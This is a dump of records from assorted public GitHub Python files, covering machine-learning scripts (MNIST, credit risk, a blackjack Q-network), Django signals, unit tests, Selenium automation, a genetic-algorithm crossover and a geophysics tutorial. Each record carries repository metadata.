input_data.read_data_sets(\"data/MNIST/\", one_hot=True)\n\nprint('Size of dataset:')\nprint('Training size:{}'.format(len(data.train.labels)))\nprint('Test size:{}'.format(len(data.test.labels)))\nprint('Validation size:{}'.format(len(data.validation.labels)))\n# 
print(type(data.train.labels))\n\n# check one hot encoding\n# print(data.test.labels[:5,:])\n\n# store label as column vector\ndata.test.cls = np.array([label.argmax() for label in data.test.labels])\n# print(data.test.cls[:5])\n\n# hyperparameters\nimage_size = 28\nimage_shape = image_size * image_size\nnum_classes = 10\nlearning_rate = 0.005\n\n# function for plotting image\ndef plot_image(images, true_class):\n\n    # img_len = np.array(len(images))\n    # plot_shape = np.reshape(img_len, [-1, 4])\n    fig, axes = plt.subplots(3, 4)\n    for i, ax in enumerate(np.ravel(axes)):\n        image = np.reshape(images[i], [image_size, image_size])\n        ax.imshow(image, cmap='binary')\n        xlabel = 'True class:{}'.format(true_class[i])\n        ax.set_xlabel(xlabel)\n        ax.set_xticks([])\n        ax.set_yticks([])\n\n    plt.show()\n    return\n\n\n# plot_image(data.test.images[:12,:], data.test.cls[:12])\n\n\n# reset tf graph\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, [None, image_shape], name='input')\nY = tf.placeholder(tf.float32, [None, num_classes], name='labels')\ny_true_cls = tf.placeholder(tf.int64, [None], name='trueclass')\n\nweights = tf.Variable(tf.random_normal([image_shape, num_classes], stddev=0.02),name='weights')\nbiases = tf.Variable(tf.zeros([num_classes]), name='biases')\n\nlogits = tf.matmul(X, weights) + biases\n\n# normalize the probability values so they sum up to 1 for each row.\ny_pred = tf.nn.softmax(logits)\n\n# get the predicted class for each sample using argmax\ny_pred_cls = tf.argmax(y_pred, axis=1)\n\nentropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y)\ncost = tf.reduce_mean(entropy)\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# performance measures\ncorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n# dictionary to be fed for test result calculations\nfeed_dict_test = {X: data.test.images,\n                  Y: data.test.labels,\n                  y_true_cls: data.test.cls}\n\n# Confusion matrix definition\ndef print_confusion_matrix(sess, true_class):\n    predicted_class = sess.run(y_pred_cls, feed_dict=feed_dict_test)\n\n    cm = confusion_matrix(y_true=true_class, y_pred=predicted_class)\n\n    print('confusion matrix for MNIST data:{}'.format(cm))\n\n    plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n    plt.tight_layout()\n    plt.colorbar()\n    tick_marks = np.arange(num_classes)\n    plt.xticks(tick_marks, range(num_classes))\n    plt.yticks(tick_marks, range(num_classes))\n    plt.xlabel('Predicted')\n    plt.ylabel('True')\n    plt.show()\n\n    return\n\n\n# plot weights to visualize the optimization and structure of weights learned with time.\ndef plot_weights(sess):\n    w = sess.run(weights)\n\n    w_min = np.min(w)\n    w_max = np.max(w)\n\n    fig, axes = plt.subplots(2, 5)\n    fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n    for i, ax in enumerate(axes.flat):\n        image = w[:,i].reshape([image_size, image_size])\n        ax.set_xlabel('weight:{0}'.format(i))\n        ax.imshow(image, vmin=w_min, vmax=w_max, cmap='seismic')\n        ax.set_xticks([])\n        ax.set_yticks([])\n    plt.show()\n    return\n\n\n# define cost and accuracy plotting function\ndef plot_cost_accuracy(cost, accuracy):\n    fig, (ax1, ax2) = plt.subplots(1, 2)\n    ax1.plot(cost)\n    ax1.set_xlabel('Training steps')\n    ax1.set_ylabel('Cost')\n    ax2.plot(accuracy)\n    ax2.set_xlabel('Training steps')\n    ax2.set_ylabel('Accuracy')\n\n    plt.show()\n\n    return\n\n\n# start training process\ndef training(dict_test, is_confusion_matrix=False, is_plot_weights=False, is_plot_cost_accuracy=False):\n    
avg_cost = []\n    avg_accuracy = []\n    epochs = 3\n    batch_size = 100\n    init = tf.global_variables_initializer()\n\n    with tf.Session() as session:\n        session.run(init)\n\n        for epoch in range(1000):\n            x_batch, y_batch = data.train.next_batch(batch_size)\n            feed_dict_train = {X: x_batch, Y: y_batch}\n            cal_cost, _ = session.run([cost, optimizer], feed_dict=feed_dict_train)\n\n            avg_cost.append(cal_cost)\n\n            if epoch % 100 == 0:\n                cal_accuracy = session.run(accuracy, feed_dict=dict_test)\n                avg_accuracy.append(cal_accuracy)\n\n                print('Cost after {0} steps:{1}'.format(epoch, cal_cost))\n                print('Accuracy after {0} steps:{1}'.format(epoch, cal_accuracy))\n\n        # print confusion matrix\n        if is_confusion_matrix:\n            print_confusion_matrix(session, data.test.cls)\n        \n        # print weights plot\n        if is_plot_weights:\n            plot_weights(session)\n\n        # plot cost and accuracy graph\n        if is_plot_cost_accuracy:\n            plot_cost_accuracy(avg_cost, avg_accuracy)\n\n        session.close()\n    return\n\n\n# check training status\ntraining(feed_dict_test)\n# training(feed_dict_test, is_plot_cost_accuracy=True)\n# training(feed_dict_test, is_plot_weights=True, is_plot_cost_accuracy=True)\n# training(feed_dict_test, is_confusion_matrix=True, is_plot_weights=True, is_plot_cost_accuracy=True)\n\n\n","repo_name":"mkumar73/neural-nets","sub_path":"01.linear_model_v1.py","file_name":"01.linear_model_v1.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37215094217","text":"# uniform crossover\n\n# assign \"heads\" to one parent, \"tails\" to the other\n# flip a coin for each gene of the first child\n# make an inverse copy of the gene for the second child\n# inheritance is independent of position\n\nimport random\n\n\ndef uniformXover(parent1, parent2):\n    offspring1 = \"\"\n    offspring2 = \"\"\n    for i in range(len(parent1)):\n        coinflip = random.randint(0, 1)\n        if coinflip == 0:\n            #print(\"choose parent 1\", parent1[i])\n            offspring1 = offspring1 + parent1[i]\n            offspring2 = offspring2 + parent2[i]\n        else:\n            #print(\"choose parent 2\", parent2[i])\n            offspring1 = offspring1 + parent2[i]\n            offspring2 = offspring2 + parent1[i]\n\n    #print(offspring1)\n    #print(offspring2)\n    return offspring1, offspring2\n\n\n#uniformXover('0000010110101110010110111010', '1000101010010011001000101101')\n","repo_name":"emedema/phm_evolutionary_optimization","sub_path":"ga_code/recombination.py","file_name":"recombination.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39564604711","text":"import json\nimport os\nimport shutil\nimport tempfile\nimport unittest\n\nimport gen_html\n\nTEST_DATA = {\n    'test1':\n        {'kubernetes-release': [{'build': 3, 'failed': False, 'time': 3.52},\n                                {'build': 4, 'failed': True, 'time': 63.21}],\n         'kubernetes-debug': [{'build': 5, 'failed': False, 'time': 7.56},\n                              {'build': 6, 'failed': False, 'time': 8.43}],\n        },\n    'test2':\n        {'kubernetes-debug': [{'build': 6, 'failed': True, 'time': 3.53}]},\n}\n\nclass GenHtmlTest(unittest.TestCase):\n    \"\"\"Unit tests for gen_html.py.\"\"\"\n    # pylint: disable=invalid-name\n\n    def testHtmlHeader_NoScript(self):\n        result = '\\n'.join(gen_html.html_header('', False))\n        self.assertNotIn('<script', result)\n\n    def gen_html(self, *args):\n        \"\"\"Return the HTML generated for TEST_DATA.\"\"\"\n        return gen_html.gen_html(TEST_DATA, *args)\n\n    def testGenHtmlFilter(self):\n        \"\"\"Test that filtering to a substring works.\"\"\"\n        html = self.gen_html('release')\n        self.assertIn('release', html)\n        self.assertNotIn('>\ntest2', html)\n        self.assertNotIn('debug', html)\n\n    def testGenHtmlFilterExact(self):\n        \"\"\"Test that filtering to an exact name works.\"\"\"\n        html = self.gen_html('release', True)\n        
self.assertIn('release', html)\n        self.assertNotIn('debug', html)\n\n    def testGetOptions(self):\n        \"\"\"Test argument parsing works correctly.\"\"\"\n\n        def check(args, expected_output_dir, expected_input):\n            \"\"\"Check that args is parsed correctly.\"\"\"\n            options = gen_html.get_options(args)\n            self.assertEquals(expected_output_dir, options.output_dir)\n            self.assertEquals(expected_input, options.input)\n\n\n        check(['--output-dir=foo', '--input=bar'], 'foo', 'bar')\n        check(['--output-dir', 'foo', '--input', 'bar'], 'foo', 'bar')\n        check(['--input=bar', '--output-dir=foo'], 'foo', 'bar')\n\n    def testGetOptions_Missing(self):\n        \"\"\"Test missing arguments raise an exception.\"\"\"\n        def check(args):\n            \"\"\"Check that args raise an exception.\"\"\"\n            with self.assertRaises(SystemExit):\n                gen_html.get_options(args)\n\n        check([])\n        check(['--output-dir=foo'])\n        check(['--input=bar'])\n\n    def testMain(self):\n        \"\"\"Test main() creates pages.\"\"\"\n        temp_dir = tempfile.mkdtemp(prefix='kube-test-hist-')\n        try:\n            tests_json = os.path.join(temp_dir, 'tests.json')\n            with open(tests_json, 'w') as buf:\n                json.dump(TEST_DATA, buf)\n            gen_html.main(tests_json, temp_dir)\n            for page in (\n                    'index',\n                    'tests-kubernetes',\n                    'suite-kubernetes-release',\n                    'suite-kubernetes-debug'):\n                self.assertTrue(os.path.exists('%s/%s.html' % (temp_dir, page)))\n        finally:\n            shutil.rmtree(temp_dir)\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"ghodss/kubernetes","sub_path":"hack/jenkins/test-history/gen_html_test.py","file_name":"gen_html_test.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"24669238122","text":"from students.models import Student\nfrom personnel.models import Payee\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom schools.models import GraduatingClass\nfrom .models import StudentAccount, PayeeAccount, RevenueLedgerAccount, SchoolFee\n\n\n@receiver(post_save, sender=Student, dispatch_uid=\"create_linked_student_account\")\ndef create_student_account(sender, instance, created, **kwargs):\n    if created:\n        StudentAccount.objects.create(student=instance)\n\n\n@receiver(post_save, sender=Payee, dispatch_uid=\"create_linked_payee_account\")\ndef create_payee_account(sender, instance, created, **kwargs):\n    if created:\n        PayeeAccount.objects.create(payee=instance)\n\n\n@receiver(post_save, sender=GraduatingClass, dispatch_uid=\"create_linked_school_fees_for_graduating_class\")\ndef create_school_fees_for_graduating_class(sender, instance, created, **kwargs):\n    if created:\n        for ledger_account in RevenueLedgerAccount.objects.filter(is_student_fee=True).all():\n            SchoolFee.objects.create(ledger_account=ledger_account, graduating_class=instance)\n\n\n@receiver(post_save, sender=RevenueLedgerAccount, dispatch_uid=\"create_linked_school_fees_for_ledger_account\")\ndef create_school_fees_for_ledger_account(sender, instance, created, **kwargs):\n    # collect the classes that already have a fee for this ledger account\n    existing_classes = set(SchoolFee.objects.filter(ledger_account=instance).values_list('graduating_class', flat=True))\n    if instance.is_student_fee:\n        for graduating_class in GraduatingClass.objects.all():\n            if graduating_class.pk not in existing_classes:\n                SchoolFee.objects.create(ledger_account=instance, 
graduating_class=graduating_class)\n","repo_name":"Frisesomorum/epobs","sub_path":"epobs-django/finance/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30032786079","text":"\"\"\"\nCreate a plot_operations.py module with a PlotOperations class inside.\n• Use the Python matplotlib to create a basic boxplot:\n◦ https://matplotlib.org/examples/pylab_examples/boxplot_demo.html\n\"\"\"\nimport matplotlib.pyplot as plt\n\n\nclass PlotOperations:\n    \"\"\"\n    Be creative. One way is a dictionary of lists. For example:\n    • weather_data = {1: [1.1, 5.5, 6.2, 7.1], 2: [8.1, 5.4, 9.6, 4.7]}\n    • The dictionary key is the month: January = 1, February = 2 etc...\n    • The data is all the mean temperatures for each day of that month.\n    \"\"\"\n\n    def display_box_plot(self, my_list, from_year, to_year):\n        \"\"\"\n        A boxplot displaying one box per month, so it shows all\n        12 months of the year on one plot.\n        \"\"\"\n        title = 'Monthly Temperature Distribution for: ' + str(from_year) + ' to ' + str(to_year)\n        loc = 'center'\n        font_dict = {'fontsize': 14, 'fontweight': 8.2, 'verticalalignment': 'baseline', 'horizontalalignment': loc}\n        plt.title(title, fontdict=font_dict, loc=loc)\n        plt.ylabel('Temperature (Celsius)')\n        plt.xlabel('Month')\n        mean_value = []\n        try:\n            # collect the list of mean temperatures for every month, then draw a single boxplot\n            for key, values in my_list.items():\n                mean_value.append(values)\n            plt.boxplot(mean_value)\n            plt.show()\n        except Exception as e:\n            print(\"An exception occurred while plotting my_list.items()\", e)\n\n","repo_name":"LiamSheng/PyProject","sub_path":"plot_operations.py","file_name":"plot_operations.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3939955507","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def hasCycle(self, head: Optional[ListNode]) -> bool:\n        \n        # method one ----> using two pointers (no need for extra space, O(1))\n        \n        slow, fast = head, head\n        \n        \n        while fast and fast.next:\n            \n            slow = slow.next\n            fast = fast.next.next\n            \n            if slow == fast:\n                return True\n        \n        \n        return False\n        \n        \n        \n        # method two -----> using a hash set of seen nodes, O(n)\n#         node_set = set()\n        \n#         curr = head\n#         while curr:\n#             if curr in node_set:\n#                 return True\n            \n#             node_set.add(curr)\n#             curr = curr.next\n#         return False\n        \n        \n","repo_name":"Beki4382/Competitive-Programming","sub_path":"0141-linked-list-cycle/0141-linked-list-cycle.py","file_name":"0141-linked-list-cycle.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38705843793","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom utilities.handy_wrappers import HandyWrappers\n\nclass DragAndDrop():\n\n    def dragAnddrop(self):\n        baseUrl = \"http://www.jqueryui.com/droppable/\"\n        driver = webdriver.Chrome()\n        actions = ActionChains(driver)\n        wrap = HandyWrappers(driver)\n        driver.maximize_window()\n        driver.implicitly_wait(5)\n        driver.get(baseUrl)\n\n        driver.switch_to.frame(0)\n        fromElement = 
wrap.getElement(\"//body[1]/div[1]\")\n toElement = wrap.getElement(\"//body/div[2]\")\n ActionChains(driver).pause(2).perform()\n\n try:\n #actions.drag_and_drop(fromElement, toElement).perform()\n actions.click_and_hold(fromElement).move_to_element(toElement).release().perform()\n print(\"Drag And Drop Successful\")\n ActionChains(driver).pause(2).perform()\n except Exception:\n print(\"Drag And Drop FAILED\")\n\nff = DragAndDrop()\nff.dragAnddrop()","repo_name":"Lunchesque/udemy","sub_path":"python_projects/SeleniumTutorial/ActionChainsClass/drag_and_drop.py","file_name":"drag_and_drop.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32982992424","text":"#!/usr/bin/env python\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import roc_auc_score, accuracy_score, mean_squared_error as MSE\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import confusion_matrix, classification_report\n\nfrom printdescribe import changepath\n\nfrom mmodules.load_Data import _loadClean\n\ndatapath = r\"E:\\TimerSeriesAnalysis\\Credit_Risk_Modelling\\Data\"\n\nsns.set_style(\"darkgrid\", {\"grid.color\": \".6\", \"grid.linestyle\": \":\"})\nsp = {\"end\":\"\\n\\n\\n\", \"sep\":\"\\n\\n\"}\n\ncredit = _loadClean()\nprint(credit.head())\n\n# # Create the X and y data sets\nX1_train = credit[\"person_income person_emp_length loan_amnt\".split()]\nX2_train = credit[\"person_income loan_percent_income cb_person_cred_hist_length\".split()]\ny_train = credit[[\"loan_status\"]]\n\n# Print the first five rows of each training set\nprint(X1_train.head())\nprint(X2_train.head())\n\n# Create and train a model on the first training data\nclf_logistic1 = LogisticRegression(solver='lbfgs').fit(X1_train, np.ravel(y_train))\n\n# Create and train a model on the second training data\nclf_logistic2 = LogisticRegression(solver='lbfgs').fit(X2_train, np.ravel(y_train))\n\n# Print the coefficients of each model\nprint(clf_logistic1.coef_, **sp)\nprint(clf_logistic2.coef_, **sp)\n\n\n# Create the X and y data sets\ny = credit[[\"loan_status\"]]\nXraw = credit.drop(columns =[\"loan_status\"])\nscaler = MinMaxScaler()\n\n#################### One-hot encoding credit data ###################\n# Create two data sets for numeric and non-numeric data\ncred_num = Xraw.select_dtypes(exclude=['object'])\ncred_str = Xraw.select_dtypes(include=['object'])\n\n# One-hot encode the non-numeric columns\ncred_str_onehot = pd.get_dummies(cred_str, drop_first=True)\ncred_str_onehot2 = pd.get_dummies(cred_str)\n\nXs = scaler.fit_transform(cred_num)\nXX = pd.DataFrame(Xs, columns=cred_num.columns)\n\n# Union the one-hot encoded columns to the numeric ones\nXall = pd.concat([XX, cred_str_onehot], axis=1)\nXall2 = pd.concat([XX, cred_str_onehot2], axis=1)\n\n# Combine all data and save for analysis\n###########################################\n# alldata = pd.concat([y, Xall], axis=1)\n# alldata2 = pd.concat([y, Xall2], axis=1)\n# with changepath(datapath):\n# alldata.to_csv(\"AnalysisData.csv\", index=False)\n# alldata2.to_csv(\"AnalysisData2.csv\", index=False)\n########################################################\n\n\n# Use train_test_split to create the training and test sets\nX_train, X_test, 
y_train, y_test = train_test_split(XX, y, test_size=.25, random_state=149, stratify=y)\n\n# Create and fit a logistic regression model\nclf_logistic = LogisticRegression(solver='lbfgs')\nclf_logistic.fit(X_train, np.ravel(y_train))\n\n# Print the parameters of the model\nprint(clf_logistic.get_params(), **sp)\n\n# Print the intercept of the model\nprint(clf_logistic.intercept_, **sp)\n\n# Create predictions of probability for loan status using test data\npreds = clf_logistic.predict_proba(X_test)\n\n# Create dataframes of first five predictions, and first five true labels\npreds_df = pd.DataFrame(preds[:,1][0:5], columns = ['prob_default'])\ntrue_df = y_test.head()\n\n# Concatenate and print the two data frames for comparison\nprint(pd.concat([true_df.reset_index(drop = True), preds_df], axis = 1), \n clf_logistic.score(X_test, y_test),**sp)","repo_name":"jocoder22/TimerSeriesAnalysis","sub_path":"Credit_Risk_Modelling/202_default_probability.py","file_name":"202_default_probability.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1417069113","text":"\"\"\"\nNames: Gabriel Almeida Mendes - DRE: 117204959\n Marcus Vinicius Torres de Oliveira - DRE: 118142223\n\"\"\"\n\n#Class that captures the current context of the program,\n#be it a function or even the entire program\nclass Contexto:\n def __init__(self, display_nome, pai=None, pai_entrando_pos=None):\n self.display_nome = display_nome\n self.pai = pai\n self.pai_entrando_pos = pai_entrando_pos\n self.tabela_simbolo = None\n\n","repo_name":"gabrielred7/compiladores_projfinalpart1","sub_path":"codigos_finais/Contexto.py","file_name":"Contexto.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9711038512","text":"import random\r\nfrom cards import Card # Imports our `cards` module\r\n\r\ndeck = []\r\n# Uses nested `for` loops to make a deck\r\nfor suit_id in range(1, 5):\r\n for rank_id in range(1, 14):\r\n deck.append(Card(suit_id, rank_id))\r\n\r\n# Picks 5 cards from the deck to make a hand\r\nhand = []\r\nfor cards in range(0, 5):\r\n a = random.choice(deck)\r\n hand.append(a)\r\n deck.remove(a)\r\n\r\nprint()\r\nfor card in hand:\r\n print(card.short_name, '=' ,card.long_name, \"Value:\",card.value)\r\n","repo_name":"zhangyiyuan2013/learn_python_book_1","sub_path":"第23章_随机性_代码清单/List_23-5_making_a_deck_of_cards.py","file_name":"List_23-5_making_a_deck_of_cards.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18431335207","text":"from pyspark.sql import SparkSession, functions as F, types as T\n\nclass jsonReader:\n def __init__(self, spark, dataframe):\n self.spark = spark\n self.dataframe = dataframe\n\n def findJSONDataframes(self):\n dataframesInDocument = [self.dataframe]\n columns = self.dataframe.columns\n for x in range(len(self.dataframe.columns)):\n name = self.dataframe.dtypes[x][0]\n Type = self.dataframe.schema[x].dataType\n if isinstance(Type, T.StructType):\n nestedDFColNames = Type.fieldNames()\n newDataframe = self.spark.createDataFrame([], Type) # use the injected session; a bare spark was undefined here\n # assumes string values; the original T.MapType.jsonValue() was invoked on the class and could never run\n testDF = self.dataframe.withColumn(name, F.from_json(self.dataframe[x], T.MapType(T.StringType(), T.StringType())))\n testDF.show()\n\n return dataframesInDocument\n\n#spark = SparkSession.builder.getOrCreate()\n\n#test = jsonReader(spark, 
spark.read.option(\"multiline\",\"true\").json(\"sample2.json\"))\n\n#test.dataframe.show()\n#print([tuple(address.values())])\n#newDF = test.dataframe.collect()[0]\n#newDF = spark.createDataFrame([tuple(address.values())], list(address.keys()))\n#test.dataframe = test.dataframe.join(newDF)\n#test.dataframe = test.dataframe.drop('address')\n#test.dataframe.show()\n","repo_name":"RasmusSecher/CleanMyData","sub_path":"CleanMyData/manager/jsonReader.py","file_name":"jsonReader.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2915477079","text":"import tensorflow as tf\nimport numpy as np\nfrom Blackjack_ import BlackjackEnv\nfrom collections import defaultdict\nimport plotting\nimport time\n\n#q network\ndef q_network(\n env,\n sess,\n estimator,\n episode_num=3000,\n discount_factor=0.9,\n epsilon_max=0.1,\n epsilon_min=0.0001\n ):\n #epsilons: decay while sampling\n epsilons = np.linspace(epsilon_max, epsilon_min, episode_num)\n policy = make_epsilon_greedy_policy(estimator, env.nA)\n\n #sample\n for i_episode in range(episode_num):\n state = env.reset()\n #process state\n state_array = state_process(state)\n #initialization for done\n done = False\n while not done:\n #epsilon-greedy policy\n A = policy(sess, state_array, epsilons[i_episode])\n #get action\n action = np.random.choice(np.arange(env.nA), p=A)\n #take action\n next_state, reward, done, info = env.step(action)\n #state process\n next_state_array = state_process(next_state)\n #if done, q(next_s, a') = 0\n if done:\n #target = r + gamma * q(next_s, a')\n q_target = reward + discount_factor * 0.0\n #reshape for tf.train_op\n q_target_array = np.array(q_target).reshape(1)\n action_array = np.array(action).reshape(1)\n print('episode:{}'.format(i_episode))\n print('action:{}'.format(action))\n print('done:{}'.format(done))\n print('q target:{}'.format(q_target))\n print('predictions:{}'.format(estimator.predict(sess, state_array)))\n print('reward:{}'.format(reward))\n print('state:{}'.format(state))\n print('normalization of state:{}'.format(state_array))\n print('='*20)\n #update estimator\n estimator.update(sess, state_array, action_array, q_target_array)\n break\n else:\n #self.predictions: [[q(s, a_1), q(s, a_2)]]\n next_q = estimator.predict(sess, next_state_array)[0]\n #q_target = r + gamma * max(q(next_s))\n q_target = reward + discount_factor * np.max(next_q)\n q_target_array = np.array(q_target).reshape(1)\n action_array = np.array(action).reshape(1)\n print('episode:{}'.format(i_episode))\n print('action:{}'.format(action))\n print('done:{}'.format(done)) \n print('q target:{}'.format(q_target))\n print('predictions:{}'.format(estimator.predict(sess, state_array)))\n print('reward:{}'.format(reward))\n print('state:{}'.format(state))\n print('normalization of state:{}'.format(state_array))\n print('='*20)\n #update estimator\n estimator.update(sess, state_array, action_array, q_target_array)\n #s = next_s\n state = next_state\n \n #get all state and v(s)\n #v(s) is set with max(q(s))\n V = defaultdict(float)\n all_state = []\n for i in range(11, 22):\n for j in range(1, 11):\n for k in [True, False]:\n all_state.append((i, j, k))\n for state in all_state:\n nor_state = state_process(state)\n v_ = np.max(estimator.predict(sess, nor_state))\n V[state] = v_\n #print('V:{}'.format(V))\n return V\n\n#q_value estimator\nclass Estimator(object):\n\n def __init__(self, learning_rate=0.003):\n self.learning_rate = 
learning_rate\n self._build_model()\n\n def _build_model(self):\n #3 layers\n n_hidden_1 = 8\n n_hidden_2 = 8\n n_input = 3\n n_class = 2\n\n #training params\n self.x_pl = tf.placeholder(tf.float32, [None, n_input])\n self.y_pl = tf.placeholder(tf.float32, [None])\n self.actions_pl = tf.placeholder(tf.int32, [None])\n batch_size = tf.shape(self.x_pl)[0]\n self.w = {\n 'h1':tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n 'h2':tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'out':tf.Variable(tf.random_normal([n_hidden_2, n_class]))\n }\n self.b = {\n 'b1':tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2':tf.Variable(tf.random_normal([n_hidden_2])),\n 'out':tf.Variable(tf.random_normal([n_class]))\n }\n\n #layers\n layer_1 = tf.add(tf.matmul(self.x_pl, self.w['h1']), self.b['b1'])\n layer_1 = tf.nn.relu(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, self.w['h2']), self.b['b2'])\n layer_2 = tf.nn.relu(layer_2)\n self.predictions = tf.add(tf.matmul(layer_2, self.w['out']), self.b['out'])\n\n #get predictions under actions just taken\n gather_indices = tf.range(batch_size) * tf.shape(self.predictions)[1] + self.actions_pl\n self.action_predictions = tf.gather(tf.reshape(self.predictions, [-1]), gather_indices)\n #loss, optimizer, init\n #self.losses = tf.nn.softmax_cross_entropy_with_logits(logits=self.action_predictions, labels=self.y_pl)\n #**************\n #use MSE not cross_entropy for better training performance\n #weights are not updated when using cross entropy as the loss fn.\n #**************\n self.losses = tf.square(self.action_predictions - self.y_pl)\n self.loss = tf.reduce_mean(self.losses)\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate)\n self.train_op = self.optimizer.minimize(self.loss)\n \n def predict(self, sess, s):\n #get predictions\n #self.predictions: [[q(s, a_1), q(s, a_2)]]\n return sess.run(self.predictions, {self.x_pl:s})\n \n def update(self, sess, s, a, y):\n #update estimator params\n _ = sess.run(self.train_op, feed_dict={self.x_pl:s, self.y_pl:y, self.actions_pl:a})\n\ndef make_epsilon_greedy_policy(estimator, nA):\n def policy_fn(sess, observation, epsilon):\n A = np.ones(nA, dtype=float) * epsilon / nA\n #q_values: [q(s, a_1), q(s, a_2)]\n q_values = estimator.predict(sess, observation)[0]\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn\n\ndef state_process(state):\n #state process\n state_nor = []\n for i in range(len(state)):\n if i == 0:\n state_nor.append(state[i] / 32.0)\n elif i == 1:\n state_nor.append(state[i] / 22.0)\n else:\n if state[i] == True:\n state_nor.append(1.0)\n else:\n state_nor.append(0.0)\n state_array = np.array(state_nor).reshape(1,3)\n return state_array\n\ndef q_network_test():\n env = BlackjackEnv()\n estimator = Estimator(0.001)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n V = q_network(env, sess, estimator, episode_num=10000)\n plotting.plot_value_function(V, title='Optimal Value Function') \n\ndef main():\n start = time.perf_counter() # time.clock() was removed in Python 3.8\n q_network_test()\n print(time.perf_counter() - start)\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"amousni/DRLinBlackjack","sub_path":"Q-network.py","file_name":"Q-network.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33598741540","text":"# Solve 2023-08-28\n\nimport sys\n\ninput = lambda : sys.stdin.readline().rstrip()\n\nli = [int(input()) for _ in range(5)]\n\nko = 
(li[1] - 1) // li[3] + 1\nmt = (li[2] - 1) // li[4] + 1\n\nprint(li[0] - max(ko, mt))\n","repo_name":"infikei/algorithm","sub_path":"baekjoon_all/05000+/boj_5532.py","file_name":"boj_5532.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"2793843455","text":"\"\"\"\nFrequency domain datapoint\n--------------------------\n\"\"\"\n\n#%%\n# There are two ways in which to create a frequency domain datapoint,\n#\n# 1) :ref:`Instantiating a frequency domain data point`\n#\n# 2) :ref:`Obtaining a datapoint from a dataset`\n#\n# Once instantiated, see :ref:`Using a frequency domain datapoint`\n\n#%%\nfrom os.path import join\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nfrom geobipy import hdfRead\nfrom geobipy import CircularLoop\nfrom geobipy import FdemSystem\nfrom geobipy import FdemData\nfrom geobipy import FdemDataPoint\nfrom geobipy import Model1D\nfrom geobipy import StatArray\nfrom geobipy import Distribution\n\n################################################################################\n# Instantiating a frequency domain data point\n# +++++++++++++++++++++++++++++++++++++++++++\n#\n# To instantiate a frequency domain datapoint we need to define some\n# characteristics of the acquisition system.\n#\n# We need to define the frequencies in Hz of the transmitter,\n# and the geometery of the loops used for each frequency.\n\nfrequencies = np.asarray([380.0, 1776.0, 3345.0, 8171.0, 41020.0, 129550.0])\n\ntransmitterLoops = [CircularLoop(orient='z'), CircularLoop(orient='z'),\n CircularLoop('x', moment=-1), CircularLoop(orient='z'),\n CircularLoop(orient='z'), CircularLoop(orient='z')]\n\nreceiverLoops = [CircularLoop(orient='z', x=7.93), CircularLoop(orient='z', x=7.91),\n CircularLoop('x', moment=1, x=9.03), CircularLoop(orient='z', x=7.91),\n CircularLoop(orient='z', x=7.91), CircularLoop(orient='z', x=7.89)]\n\n################################################################################\n# Now we can instantiate the system.\nfds = FdemSystem(frequencies, transmitterLoops, receiverLoops)\n\n################################################################################\n# And use the system to instantiate a datapoint\n#\n# Note the extra arguments that can be used to create the data point.\n# data is for any observed data one might have, while std are the estimated standard\n# deviations of those observed data.\n#\n# Define some in-phase then quadrature data for each 